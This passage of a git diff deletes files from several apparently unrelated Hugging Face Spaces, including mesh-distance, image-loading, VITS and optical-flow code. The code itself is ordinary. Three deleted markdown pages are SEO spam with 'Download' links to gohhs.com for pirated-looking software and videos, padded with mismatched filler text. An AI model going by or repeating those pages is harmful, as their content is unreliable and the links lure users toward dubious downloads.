tp.Union[Path, str], out_folder: tp.Union[Path, str]): - sig = Path(checkpoint_path).parent.name - assert len(sig) == 8, "Not a valid Dora signature" - pkg = torch.load(checkpoint_path, 'cpu') - new_pkg = { - 'best_state': pkg['fsdp_best_state']['model'], - 'xp.cfg': OmegaConf.to_yaml(_clean_lm_cfg(pkg['xp.cfg'])) - } - out_file = Path(out_folder) / f'{sig}.th' - torch.save(new_pkg, out_file) - return out_file diff --git a/spaces/runa91/bite_gradio/src/graph_networks/losses_for_vertex_wise_predictions/calculate_distance_between_points_on_mesh_forfourpaws.py b/spaces/runa91/bite_gradio/src/graph_networks/losses_for_vertex_wise_predictions/calculate_distance_between_points_on_mesh_forfourpaws.py deleted file mode 100644 index 9518dcec3d5274f69f6b5880584bbdc36e58cd22..0000000000000000000000000000000000000000 --- a/spaces/runa91/bite_gradio/src/graph_networks/losses_for_vertex_wise_predictions/calculate_distance_between_points_on_mesh_forfourpaws.py +++ /dev/null @@ -1,213 +0,0 @@ - -""" -code adapted from: https://github.com/mikedh/trimesh/blob/main/examples/shortest.py -shortest.py ----------------- -Given a mesh and two vertex indices find the shortest path -between the two vertices while only traveling along edges -of the mesh. -""" - -# python src/graph_networks/losses_for_vertex_wise_predictions/calculate_distance_between_points_on_mesh_forfourpaws.py - - -import os -import sys -import glob -import csv -import json -import shutil -import tqdm -import numpy as np -import pickle as pkl -import trimesh -import networkx as nx - - - - - -def read_csv(csv_file): - with open(csv_file,'r') as f: - reader = csv.reader(f) - headers = next(reader) - row_list = [{h:x for (h,x) in zip(headers,row)} for row in reader] - return row_list - - -def load_all_template_mesh_distances(root_out_path, filename='all_vertex_distances.npy'): - vert_dists = np.load(root_out_path + filename) - return vert_dists - - -def prepare_graph_from_template_mesh_and_calculate_all_distances(path_mesh, root_out_path, calc_dist_mat=False): - # root_out_path = ROOT_OUT_PATH - ''' - from smal_pytorch.smal_model.smal_torch_new import SMAL - smal = SMAL() - verts = smal.v_template.detach().cpu().numpy() - faces = smal.faces.detach().cpu().numpy() - ''' - # path_mesh = ROOT_PATH_MESH + 'mesh_downsampling_meshesmy_smpl_39dogsnorm_Jr_4_dog_template_downsampled0.obj' - my_mesh = trimesh.load_mesh(path_mesh, process=False, maintain_order=True) - verts = my_mesh.vertices - faces = my_mesh.faces - # edges without duplication - edges = my_mesh.edges_unique - # the actual length of each unique edge - length = my_mesh.edges_unique_length - # create the graph with edge attributes for length (option A) - # g = nx.Graph() - # for edge, L in zip(edges, length): g.add_edge(*edge, length=L) - # you can create the graph with from_edgelist and - # a list comprehension (option B) - ga = nx.from_edgelist([(e[0], e[1], {'length': L}) for e, L in zip(edges, length)]) - # calculate the distances between all vertex pairs - if calc_dist_mat: - # calculate distances between all possible vertex pairs - # shortest_path = nx.shortest_path(ga, source=ind_v0, target=ind_v1, weight='length') - # shortest_dist = nx.shortest_path_length(ga, source=ind_v0, target=ind_v1, weight='length') - dis = dict(nx.shortest_path_length(ga, weight='length', method='dijkstra')) - vertex_distances = np.zeros((n_verts_smal, n_verts_smal)) - for ind_v0 in range(n_verts_smal): - print(ind_v0) - for ind_v1 in range(ind_v0, n_verts_smal): - vertex_distances[ind_v0, ind_v1] = dis[ind_v0][ind_v1] - vertex_distances[ind_v1, ind_v0] = dis[ind_v0][ind_v1] - # save those distances - np.save(root_out_path + 'all_vertex_distances.npy', vertex_distances) - vert_dists = vertex_distances - else: - vert_dists = np.load(root_out_path + 'all_vertex_distances.npy') - return ga, vert_dists - - -def calculate_vertex_overview_for_gc_annotation(name, gc_info_raw, vert_dists, root_out_path_vis=None, verts=None, faces=None, img_v12_dir=None): - # input: - # root_out_path_vis = ROOT_OUT_PATH - # img_v12_dir = IMG_V12_DIR - # name = images_with_gc_labelled[ind_img] - # gc_info_raw = gc_dict['bite/' + name] - # output: - # vertex_overview: np array of shape (n_verts_smal, 3) with [first: no-contact=0 contact=1 second: index of vertex third: dist] - n_verts_smal = 3889 - gc_vertices = [] - gc_info_np = np.zeros((n_verts_smal)) - for ind_v in gc_info_raw: - if ind_v < n_verts_smal: - gc_vertices.append(ind_v) - gc_info_np[ind_v] = 1 - # save a visualization of those annotations - if root_out_path_vis is not None: - my_mesh = trimesh.Trimesh(vertices=verts, faces=faces, process=False, maintain_order=True) - if img_v12_dir is not None and root_out_path_vis is not None: - vert_colors = np.repeat(255*gc_info_np[:, None], 3, 1) - my_mesh.visual.vertex_colors = vert_colors - my_mesh.export(root_out_path_vis + (name).replace('.jpg', '_withgc.obj')) - img_path = img_v12_dir + name - shutil.copy(img_path, root_out_path_vis + name) - # calculate for each vertex the distance to the closest element of the other group - non_gc_vertices = list(set(range(n_verts_smal)) - set(gc_vertices)) - print('vertices in contact: ' + str(len(gc_vertices))) - print('vertices without contact: ' + str(len(non_gc_vertices))) - vertex_overview = np.zeros((n_verts_smal, 3)) # first: no-contact=0 contact=1 second: index of vertex third: dist - vertex_overview[:, 0] = gc_info_np - # loop through all contact vertices - for ind_v in gc_vertices: - min_length = 100 - for ind_v_ps in non_gc_vertices: # possible solution - # this_path = nx.shortest_path(ga, source=ind_v, target=ind_v_ps, weight='length') - # this_length = nx.shortest_path_length(ga, source=ind_v, target=ind_v_ps, weight='length') - this_length = vert_dists[ind_v, ind_v_ps] - if this_length < min_length: - min_length = this_length - vertex_overview[ind_v, 1] = ind_v_ps - vertex_overview[ind_v, 2] = this_length - # loop through all non-contact vertices - for ind_v in non_gc_vertices: - min_length = 100 - for ind_v_ps in gc_vertices: # possible solution - # this_path = nx.shortest_path(ga, source=ind_v, target=ind_v_ps, weight='length') - # this_length = nx.shortest_path_length(ga, source=ind_v, target=ind_v_ps, weight='length') - this_length = vert_dists[ind_v, ind_v_ps] - if this_length < min_length: - min_length = this_length - vertex_overview[ind_v, 1] = ind_v_ps - vertex_overview[ind_v, 2] = this_length - if root_out_path_vis is not None: - # save a colored mesh - my_mesh_dists = my_mesh.copy() - scale_0 = (vertex_overview[vertex_overview[:, 0]==0, 2]).max() - scale_1 = (vertex_overview[vertex_overview[:, 0]==1, 2]).max() - vert_col = np.zeros((n_verts_smal, 3)) - vert_col[vertex_overview[:, 0]==0, 1] = vertex_overview[vertex_overview[:, 0]==0, 2] * 255 / scale_0 # green - vert_col[vertex_overview[:, 0]==1, 0] = vertex_overview[vertex_overview[:, 0]==1, 2] * 255 / scale_1 # red - my_mesh_dists.visual.vertex_colors = np.uint8(vert_col) - my_mesh_dists.export(root_out_path_vis + (name).replace('.jpg', '_withgcdists.obj')) - return vertex_overview - - - - - - - - - -def main(): - - ROOT_PATH_MESH = '/is/cluster/work/nrueegg/icon_pifu_related/barc_for_bite/src/graph_networks/graphcmr/data/meshes/' - IMG_V12_DIR = '/ps/scratch/nrueegg/new_projects/Animals/data/dog_datasets/Stanford_Dogs_Dataset/StanfordExtra_V12/StanExtV12_Images/' - # ROOT_OUT_PATH = '/is/cluster/work/nrueegg/icon_pifu_related/barc_for_bite/src/graph_networks/losses_for_vertex_wise_predictions/debugging_results/' - ROOT_OUT_PATH = '/is/cluster/work/nrueegg/icon_pifu_related/barc_for_bite/data/stanext_related_data/ground_contact_annotations/stages12together/' - ROOT_PATH_ALL_VERT_DIST_TEMPLATE = '/is/cluster/work/nrueegg/icon_pifu_related/barc_for_bite/data/stanext_related_data/ground_contact_annotations/' - - # load all vertex distances - path_mesh = ROOT_PATH_MESH + 'mesh_downsampling_meshesmy_smpl_39dogsnorm_Jr_4_dog_template_downsampled0.obj' - my_mesh = trimesh.load_mesh(path_mesh, process=False, maintain_order=True) - verts = my_mesh.vertices - faces = my_mesh.faces - # vert_dists, ga = prepare_graph_from_template_mesh_and_calculate_all_distances(path_mesh, ROOT_OUT_PATH, calc_dist_mat=False) - vert_dists = load_all_template_mesh_distances(ROOT_PATH_ALL_VERT_DIST_TEMPLATE, filename='all_vertex_distances.npy') - - # paw vertices: - # left and right is a bit different, but that is ok (we will anyways mirror data at training time) - right_front_paw = [3829,+3827,+3825,+3718,+3722,+3723,+3743,+3831,+3719,+3726,+3716,+3724,+3828,+3717,+3721,+3725,+3832,+3830,+3720,+3288,+3740,+3714,+3826,+3715,+3728,+3712,+3287,+3284,+3727,+3285,+3742,+3291,+3710,+3697,+3711,+3289,+3730,+3713,+3739,+3282,+3738,+3708,+3709,+3741,+3698,+3696,+3308,+3695,+3706,+3700,+3707,+3306,+3305,+3737,+3304,+3303,+3307,+3736,+3735,+3250,+3261,+3732,+3734,+3733,+3731,+3729,+3299,+3297,+3298,+3295,+3293,+3296,+3294,+3292,+3312,+3311,+3314,+3309,+3290,+3313,+3410,+3315,+3411,+3412,+3316,+3421,+3317,+3415,+3445,+3327,+3328,+3283,+3343,+3326,+3325,+3330,+3286,+3399,+3398,+3329,+3446,+3400,+3331,+3401,+3281,+3332,+3279,+3402,+3419,+3407,+3356,+3358,+3357,+3280,+3354,+3277,+3278,+3346,+3347,+3377,+3378,+3345,+3386,+3379,+3348,+3384,+3418,+3372,+3276,+3275,+3374,+3274,+3373,+3375,+3369,+3371,+3376,+3273,+3396,+3397,+3395,+3388,+3360,+3370,+3361,+3394,+3387,+3420,+3359,+3389,+3272,+3391,+3393,+3390,+3392,+3363,+3362,+3367,+3365,+3705,+3271,+3704,+3703,+3270,+3269,+3702,+3268,+3224,+3267,+3701,+3225,+3699,+3265,+3264,+3266,+3263,+3262,+3249,+3228,+3230,+3251,+3301,+3300,+3302,+3252] - right_back_paw = [3472,+3627,+3470,+3469,+3471,+3473,+3626,+3625,+3475,+3655,+3519,+3468,+3629,+3466,+3476,+3624,+3521,+3654,+3657,+3838,+3518,+3653,+3839,+3553,+3474,+3516,+3656,+3628,+3834,+3535,+3630,+3658,+3477,+3520,+3517,+3595,+3522,+3597,+3596,+3501,+3534,+3503,+3478,+3500,+3479,+3502,+3607,+3499,+3608,+3496,+3605,+3609,+3504,+3606,+3642,+3614,+3498,+3480,+3631,+3610,+3613,+3506,+3659,+3660,+3632,+3841,+3661,+3836,+3662,+3633,+3663,+3664,+3634,+3635,+3486,+3665,+3636,+3637,+3666,+3490,+3837,+3667,+3493,+3638,+3492,+3495,+3616,+3644,+3494,+3835,+3643,+3833,+3840,+3615,+3650,+3668,+3652,+3651,+3645,+3646,+3647,+3649,+3648,+3622,+3617,+3448,+3621,+3618,+3623,+3462,+3464,+3460,+3620,+3458,+3461,+3463,+3465,+3573,+3571,+3467,+3569,+3557,+3558,+3572,+3570,+3556,+3585,+3593,+3594,+3459,+3566,+3592,+3567,+3568,+3538,+3539,+3555,+3537,+3536,+3554,+3575,+3574,+3583,+3541,+3550,+3576,+3581,+3639,+3577,+3551,+3582,+3580,+3552,+3578,+3542,+3549,+3579,+3523,+3526,+3598,+3525,+3600,+3640,+3599,+3601,+3602,+3603,+3529,+3604,+3530,+3533,+3532,+3611,+3612,+3482,+3481,+3505,+3452,+3455,+3456,+3454,+3457,+3619,+3451,+3450,+3449,+3591,+3589,+3641,+3584,+3561,+3587,+3559,+3488,+3484,+3483] - left_front_paw = [1791,+1950,+1948,+1790,+1789,+1746,+1788,+1747,+1949,+1944,+1792,+1945,+1356,+1775,+1759,+1777,+1787,+1946,+1757,+1761,+1745,+1943,+1947,+1744,+1309,+1786,+1771,+1354,+1774,+1765,+1767,+1768,+1772,+1763,+1770,+1773,+1769,+1764,+1766,+1758,+1760,+1762,+1336,+1333,+1330,+1325,+1756,+1323,+1755,+1753,+1749,+1754,+1751,+1321,+1752,+1748,+1750,+1312,+1319,+1315,+1313,+1317,+1318,+1316,+1314,+1311,+1310,+1299,+1276,+1355,+1297,+1353,+1298,+1300,+1352,+1351,+1785,+1784,+1349,+1783,+1782,+1781,+1780,+1779,+1778,+1776,+1343,+1341,+1344,+1339,+1342,+1340,+1360,+1335,+1338,+1362,+1357,+1361,+1363,+1458,+1337,+1459,+1456,+1460,+1493,+1332,+1375,+1376,+1331,+1374,+1378,+1334,+1373,+1494,+1377,+1446,+1448,+1379,+1449,+1329,+1327,+1404,+1406,+1405,+1402,+1328,+1426,+1432,+1434,+1403,+1394,+1395,+1433,+1425,+1286,+1380,+1466,+1431,+1290,+1401,+1381,+1427,+1450,+1393,+1430,+1326,+1396,+1428,+1397,+1429,+1398,+1420,+1324,+1422,+1417,+1419,+1421,+1443,+1418,+1423,+1444,+1442,+1424,+1445,+1495,+1440,+1441,+1468,+1436,+1408,+1322,+1435,+1415,+1439,+1409,+1283,+1438,+1416,+1407,+1437,+1411,+1413,+1414,+1320,+1273,+1272,+1278,+1469,+1463,+1457,+1358,+1464,+1465,+1359,+1372,+1391,+1390,+1455,+1447,+1454,+1467,+1453,+1452,+1451,+1383,+1345,+1347,+1348,+1350,+1364,+1392,+1410,+1412] - left_back_paw = [1957,+1958,+1701,+1956,+1951,+1703,+1715,+1702,+1700,+1673,+1705,+1952,+1955,+1674,+1699,+1675,+1953,+1704,+1954,+1698,+1677,+1671,+1672,+1714,+1706,+1676,+1519,+1523,+1686,+1713,+1692,+1685,+1543,+1664,+1712,+1691,+1959,+1541,+1684,+1542,+1496,+1663,+1540,+1497,+1499,+1498,+1500,+1693,+1665,+1694,+1716,+1666,+1695,+1501,+1502,+1696,+1667,+1503,+1697,+1504,+1668,+1669,+1506,+1670,+1508,+1510,+1507,+1509,+1511,+1512,+1621,+1606,+1619,+1605,+1513,+1620,+1618,+1604,+1633,+1641,+1642,+1607,+1617,+1514,+1632,+1614,+1689,+1640,+1515,+1586,+1616,+1516,+1517,+1603,+1615,+1639,+1585,+1521,+1602,+1587,+1584,+1601,+1623,+1622,+1631,+1598,+1624,+1629,+1589,+1687,+1625,+1599,+1630,+1569,+1570,+1628,+1626,+1597,+1627,+1590,+1594,+1571,+1568,+1567,+1574,+1646,+1573,+1645,+1648,+1564,+1688,+1647,+1643,+1649,+1650,+1651,+1577,+1644,+1565,+1652,+1566,+1578,+1518,+1524,+1583,+1582,+1520,+1581,+1522,+1525,+1549,+1551,+1580,+1552,+1550,+1656,+1658,+1554,+1657,+1659,+1548,+1655,+1690,+1660,+1556,+1653,+1558,+1661,+1544,+1662,+1654,+1547,+1545,+1527,+1560,+1526,+1678,+1679,+1528,+1708,+1707,+1680,+1529,+1530,+1709,+1546,+1681,+1710,+1711,+1682,+1532,+1531,+1683,+1534,+1533,+1536,+1538,+1600,+1553] - - - all_contact_vertices = right_front_paw + right_back_paw + left_front_paw + left_back_paw - - name = 'all4pawsincontact.jpg' - print('work on 4paw images') - gc_info_raw = all_contact_vertices # a list with all vertex numbers that are in ground contact - - vertex_overview = calculate_vertex_overview_for_gc_annotation(name, gc_info_raw, vert_dists, root_out_path_vis=ROOT_OUT_PATH, verts=verts, faces=faces, img_v12_dir=None) - np.save(ROOT_OUT_PATH + name.replace('.jpg', '_gc_vertdists_overview.npy'), vertex_overview) - - vertex_overview_dict = {} - vertex_overview_dict[name.split('.')[0]] = {'gc_vertdists_overview': vertex_overview, 'gc_index_list': gc_info_raw} - with open(ROOT_OUT_PATH + 'gc_annots_overview_all4pawsincontact_xx.pkl', 'wb') as fp: - pkl.dump(vertex_overview_dict, fp) - - - - - - - - - - - -if __name__ == "__main__": - main() - - - - - - - diff --git a/spaces/rycont/Biblify/README.md b/spaces/rycont/Biblify/README.md deleted file mode 100644 index ad81305b2e49432a9d1485f9cd01c794d66aab0e..0000000000000000000000000000000000000000 --- a/spaces/rycont/Biblify/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Biblify -emoji: 🌍 -colorFrom: blue -colorTo: green -sdk: streamlit -sdk_version: 1.21.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/safi842/FashionGen/netdissect/parallelfolder.py b/spaces/safi842/FashionGen/netdissect/parallelfolder.py deleted file mode 100644 index a741691569a7c85e96d3b3d9be12b40d508f0044..0000000000000000000000000000000000000000 --- a/spaces/safi842/FashionGen/netdissect/parallelfolder.py +++ /dev/null @@ -1,118 +0,0 @@ -''' -Variants of pytorch's ImageFolder for loading image datasets with more -information, such as parallel feature channels in separate files, -cached files with lists of filenames, etc. -''' - -import os, torch, re -import torch.utils.data as data -from torchvision.datasets.folder import default_loader -from PIL import Image -from collections import OrderedDict -from .progress import default_progress - -def grayscale_loader(path): - with open(path, 'rb') as f: - return Image.open(f).convert('L') - -class ParallelImageFolders(data.Dataset): - """ - A data loader that looks for parallel image filenames, for example - - photo1/park/004234.jpg - photo1/park/004236.jpg - photo1/park/004237.jpg - - photo2/park/004234.png - photo2/park/004236.png - photo2/park/004237.png - """ - def __init__(self, image_roots, - transform=None, - loader=default_loader, - stacker=None, - intersection=False, - verbose=None, - size=None): - self.image_roots = image_roots - self.images = make_parallel_dataset(image_roots, - intersection=intersection, verbose=verbose) - if len(self.images) == 0: - raise RuntimeError("Found 0 images within: %s" % image_roots) - if size is not None: - self.image = self.images[:size] - if transform is not None and not hasattr(transform, '__iter__'): - transform = [transform for _ in image_roots] - self.transforms = transform - self.stacker = stacker - self.loader = loader - - def __getitem__(self, index): - paths = self.images[index] - sources = [self.loader(path) for path in paths] - # Add a common shared state dict to allow random crops/flips to be - # coordinated. - shared_state = {} - for s in sources: - s.shared_state = shared_state - if self.transforms is not None: - sources = [transform(source) - for source, transform in zip(sources, self.transforms)] - if self.stacker is not None: - sources = self.stacker(sources) - else: - sources = tuple(sources) - return sources - - def __len__(self): - return len(self.images) - -def is_npy_file(path): - return path.endswith('.npy') or path.endswith('.NPY') - -def is_image_file(path): - return None != re.search(r'\.(jpe?g|png)$', path, re.IGNORECASE) - -def walk_image_files(rootdir, verbose=None): - progress = default_progress(verbose) - indexfile = '%s.txt' % rootdir - if os.path.isfile(indexfile): - basedir = os.path.dirname(rootdir) - with open(indexfile) as f: - result = sorted([os.path.join(basedir, line.strip()) - for line in progress(f.readlines(), - desc='Reading %s' % os.path.basename(indexfile))]) - return result - result = [] - for dirname, _, fnames in sorted(progress(os.walk(rootdir), - desc='Walking %s' % os.path.basename(rootdir))): - for fname in sorted(fnames): - if is_image_file(fname) or is_npy_file(fname): - result.append(os.path.join(dirname, fname)) - return result - -def make_parallel_dataset(image_roots, intersection=False, verbose=None): - """ - Returns [(img1, img2), (img1, img2)..] - """ - image_roots = [os.path.expanduser(d) for d in image_roots] - image_sets = OrderedDict() - for j, root in enumerate(image_roots): - for path in walk_image_files(root, verbose=verbose): - key = os.path.splitext(os.path.relpath(path, root))[0] - if key not in image_sets: - image_sets[key] = [] - if not intersection and len(image_sets[key]) != j: - raise RuntimeError( - 'Images not parallel: %s missing from one dir' % (key)) - image_sets[key].append(path) - tuples = [] - for key, value in image_sets.items(): - if len(value) != len(image_roots): - if intersection: - continue - else: - raise RuntimeError( - 'Images not parallel: %s missing from one dir' % (key)) - tuples.append(tuple(value)) - return tuples diff --git a/spaces/sai22/vits-models/commons.py b/spaces/sai22/vits-models/commons.py deleted file mode 100644 index 40fcc05364d4815971f5c6f9dbb8dcef8e3ec1e9..0000000000000000000000000000000000000000 --- a/spaces/sai22/vits-models/commons.py +++ /dev/null @@ -1,172 +0,0 @@ -import math -import torch -from torch.nn import functional as F -import torch.jit - - -def script_method(fn, _rcb=None): - return fn - - -def script(obj, optimize=True, _frames_up=0, _rcb=None): - return obj - - -torch.jit.script_method = script_method -torch.jit.script = script - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size*dilation - dilation)/2) - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def intersperse(lst, item): - result = [item] * (len(lst) * 2 + 1) - result[1::2] = lst - return result - - -def kl_divergence(m_p, logs_p, m_q, logs_q): - """KL(P||Q)""" - kl = (logs_q - logs_p) - 0.5 - kl += 0.5 * (torch.exp(2. * logs_p) + ((m_p - m_q)**2)) * torch.exp(-2. * logs_q) - return kl - - -def rand_gumbel(shape): - """Sample from the Gumbel distribution, protect from overflows.""" - uniform_samples = torch.rand(shape) * 0.99998 + 0.00001 - return -torch.log(-torch.log(uniform_samples)) - - -def rand_gumbel_like(x): - g = rand_gumbel(x.size()).to(dtype=x.dtype, device=x.device) - return g - - -def slice_segments(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + segment_size - ret[i] = x[i, :, idx_str:idx_end] - return ret - - -def rand_slice_segments(x, x_lengths=None, segment_size=4): - b, d, t = x.size() - if x_lengths is None: - x_lengths = t - ids_str_max = x_lengths - segment_size + 1 - ids_str = (torch.rand([b]).to(device=x.device) * ids_str_max).to(dtype=torch.long) - ret = slice_segments(x, ids_str, segment_size) - return ret, ids_str - - -def get_timing_signal_1d( - length, channels, min_timescale=1.0, max_timescale=1.0e4): - position = torch.arange(length, dtype=torch.float) - num_timescales = channels // 2 - log_timescale_increment = ( - math.log(float(max_timescale) / float(min_timescale)) / - (num_timescales - 1)) - inv_timescales = min_timescale * torch.exp( - torch.arange(num_timescales, dtype=torch.float) * -log_timescale_increment) - scaled_time = position.unsqueeze(0) * inv_timescales.unsqueeze(1) - signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)], 0) - signal = F.pad(signal, [0, 0, 0, channels % 2]) - signal = signal.view(1, channels, length) - return signal - - -def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return x + signal.to(dtype=x.dtype, device=x.device) - - -def cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return torch.cat([x, signal.to(dtype=x.dtype, device=x.device)], axis) - - -def subsequent_mask(length): - mask = torch.tril(torch.ones(length, length)).unsqueeze(0).unsqueeze(0) - return mask - - -@torch.jit.script -def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels): - n_channels_int = n_channels[0] - in_act = input_a + input_b - t_act = torch.tanh(in_act[:, :n_channels_int, :]) - s_act = torch.sigmoid(in_act[:, n_channels_int:, :]) - acts = t_act * s_act - return acts - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def shift_1d(x): - x = F.pad(x, convert_pad_shape([[0, 0], [0, 0], [1, 0]]))[:, :, :-1] - return x - - -def sequence_mask(length, max_length=None): - if max_length is None: - max_length = length.max() - x = torch.arange(max_length, dtype=length.dtype, device=length.device) - return x.unsqueeze(0) < length.unsqueeze(1) - - -def generate_path(duration, mask): - """ - duration: [b, 1, t_x] - mask: [b, 1, t_y, t_x] - """ - device = duration.device - - b, _, t_y, t_x = mask.shape - cum_duration = torch.cumsum(duration, -1) - - cum_duration_flat = cum_duration.view(b * t_x) - path = sequence_mask(cum_duration_flat, t_y).to(mask.dtype) - path = path.view(b, t_x, t_y) - path = path - F.pad(path, convert_pad_shape([[0, 0], [1, 0], [0, 0]]))[:, :-1] - path = path.unsqueeze(1).transpose(2,3) * mask - return path - - -def clip_grad_value_(parameters, clip_value, norm_type=2): - if isinstance(parameters, torch.Tensor): - parameters = [parameters] - parameters = list(filter(lambda p: p.grad is not None, parameters)) - norm_type = float(norm_type) - if clip_value is not None: - clip_value = float(clip_value) - - total_norm = 0 - for p in parameters: - param_norm = p.grad.data.norm(norm_type) - total_norm += param_norm.item() ** norm_type - if clip_value is not None: - p.grad.data.clamp_(min=-clip_value, max=clip_value) - total_norm = total_norm ** (1. / norm_type) - return total_norm diff --git a/spaces/scedlatioru/img-to-music/example/Hd 2014 Led Software Download TOP.md b/spaces/scedlatioru/img-to-music/example/Hd 2014 Led Software Download TOP.md deleted file mode 100644 index 8ccc1edd56184105ee19cacfcbc12bbbed1e39d0..0000000000000000000000000000000000000000 --- a/spaces/scedlatioru/img-to-music/example/Hd 2014 Led Software Download TOP.md +++ /dev/null @@ -1,6 +0,0 @@ -

        Hd 2014 Led Software Download


        DOWNLOADhttps://gohhs.com/2uEyK5



        -
        -Apache Drill is an open source distributed software framework for interactive analysis. ... A group of contributors led by Ted Dunning of MapR proposed to develop an open ... Drill graduated to top-level project status in December 2014. ... Prospective users can download and install Drill directly from the project web site; ... 1fdad05405
        -
        -
        -

        diff --git a/spaces/scedlatioru/img-to-music/example/Pink Movie English Sub [WORK] Download.md b/spaces/scedlatioru/img-to-music/example/Pink Movie English Sub [WORK] Download.md deleted file mode 100644 index bbc402ee1dde39cd8db0834c4e66b8b9e3873762..0000000000000000000000000000000000000000 --- a/spaces/scedlatioru/img-to-music/example/Pink Movie English Sub [WORK] Download.md +++ /dev/null @@ -1,6 +0,0 @@ -

        Pink Movie English Sub Download


        Download File ✵✵✵ https://gohhs.com/2uEA4t



        - -Pink Floyd - Another Brick in the Wall subtitle, synchronized lyrics and ... You can also download subtitles for your movies or TV series automatically with the ... 1fdad05405
        -
        -
        -

        diff --git a/spaces/scedlatioru/img-to-music/example/VirtuaGirl 2.541 (sexy Video Wallpapers On Desktop) Full Version 2021.md b/spaces/scedlatioru/img-to-music/example/VirtuaGirl 2.541 (sexy Video Wallpapers On Desktop) Full Version 2021.md deleted file mode 100644 index 6bf62df13b0879ba1f7a4af548a085f3d6d55ae4..0000000000000000000000000000000000000000 --- a/spaces/scedlatioru/img-to-music/example/VirtuaGirl 2.541 (sexy Video Wallpapers On Desktop) Full Version 2021.md +++ /dev/null @@ -1,6 +0,0 @@ -

        VirtuaGirl 2.541 (sexy video wallpapers on desktop) full version


        Download ……… https://gohhs.com/2uEzQy



        - -Tennis World Tour est disponible sur PS4, Xbox One, PC et Nintendo Switch.. S'agirait-il ... VirtuaGirl 2.541 (sexy Video Wallpapers On Desktop) Download Pcl ... Crazy Little Thing Called Love Thai Movie Torrent 36l 4d29de3e1b
        -
        -
        -

        diff --git a/spaces/sczhou/ProPainter/scripts/compute_flow.py b/spaces/sczhou/ProPainter/scripts/compute_flow.py deleted file mode 100644 index 8596e4dc95c1969826adaf9c72a076584886ece2..0000000000000000000000000000000000000000 --- a/spaces/sczhou/ProPainter/scripts/compute_flow.py +++ /dev/null @@ -1,108 +0,0 @@ -# -*- coding: utf-8 -*- -import sys -sys.path.append(".") - -import os -import cv2 -import argparse -from PIL import Image -import torch -import torch.nn.functional as F -from torchvision import transforms - -from RAFT import RAFT -from utils.flow_util import * - -def imwrite(img, file_path, params=None, auto_mkdir=True): - if auto_mkdir: - dir_name = os.path.abspath(os.path.dirname(file_path)) - os.makedirs(dir_name, exist_ok=True) - return cv2.imwrite(file_path, img, params) - -def initialize_RAFT(model_path='weights/raft-things.pth', device='cuda'): - """Initializes the RAFT model. - """ - args = argparse.ArgumentParser() - args.raft_model = model_path - args.small = False - args.mixed_precision = False - args.alternate_corr = False - - model = torch.nn.DataParallel(RAFT(args)) - model.load_state_dict(torch.load(args.raft_model)) - - model = model.module - model.to(device) - model.eval() - - return model - - -if __name__ == '__main__': - device = 'cuda' - - parser = argparse.ArgumentParser() - parser.add_argument('-i', '--root_path', type=str, default='your_dataset_root/youtube-vos/JPEGImages') - parser.add_argument('-o', '--save_path', type=str, default='your_dataset_root/youtube-vos/Flows_flo') - parser.add_argument('--height', type=int, default=240) - parser.add_argument('--width', type=int, default=432) - - args = parser.parse_args() - - # Flow model - RAFT_model = initialize_RAFT(device=device) - - root_path = args.root_path - save_path = args.save_path - h_new, w_new = (args.height, args.width) - - file_list = sorted(os.listdir(root_path)) - for f in file_list: - print(f'Processing: {f} ...') - m_list = sorted(os.listdir(os.path.join(root_path, f))) - len_m = len(m_list) - for i in range(len_m-1): - img1_path = os.path.join(root_path, f, m_list[i]) - img2_path = os.path.join(root_path, f, m_list[i+1]) - img1 = Image.fromarray(cv2.imread(img1_path)) - img2 = Image.fromarray(cv2.imread(img2_path)) - - transform = transforms.Compose([transforms.ToTensor()]) - - img1 = transform(img1).unsqueeze(0).to(device)[:,[2,1,0],:,:] - img2 = transform(img2).unsqueeze(0).to(device)[:,[2,1,0],:,:] - - # upsize to a multiple of 16 - # h, w = img1.shape[2:4] - # w_new = w if (w % 16) == 0 else 16 * (w // 16 + 1) - # h_new = h if (h % 16) == 0 else 16 * (h // 16 + 1) - - - img1 = F.interpolate(input=img1, - size=(h_new, w_new), - mode='bilinear', - align_corners=False) - img2 = F.interpolate(input=img2, - size=(h_new, w_new), - mode='bilinear', - align_corners=False) - - with torch.no_grad(): - img1 = img1*2 - 1 - img2 = img2*2 - 1 - - _, flow_f = RAFT_model(img1, img2, iters=20, test_mode=True) - _, flow_b = RAFT_model(img2, img1, iters=20, test_mode=True) - - - flow_f = flow_f[0].permute(1,2,0).cpu().numpy() - flow_b = flow_b[0].permute(1,2,0).cpu().numpy() - - # flow_f = resize_flow(flow_f, w_new, h_new) - # flow_b = resize_flow(flow_b, w_new, h_new) - - save_flow_f = os.path.join(save_path, f, f'{m_list[i][:-4]}_{m_list[i+1][:-4]}_f.flo') - save_flow_b = os.path.join(save_path, f, f'{m_list[i+1][:-4]}_{m_list[i][:-4]}_b.flo') - - flowwrite(flow_f, save_flow_f, quantize=False) - flowwrite(flow_b, save_flow_b, quantize=False) diff --git a/spaces/segments/panoptic-segment-anything/segment_anything/CODE_OF_CONDUCT.md b/spaces/segments/panoptic-segment-anything/segment_anything/CODE_OF_CONDUCT.md deleted file mode 100644 index 08b500a221857ec3f451338e80b4a9ab1173a1af..0000000000000000000000000000000000000000 --- a/spaces/segments/panoptic-segment-anything/segment_anything/CODE_OF_CONDUCT.md +++ /dev/null @@ -1,80 +0,0 @@ -# Code of Conduct - -## Our Pledge - -In the interest of fostering an open and welcoming environment, 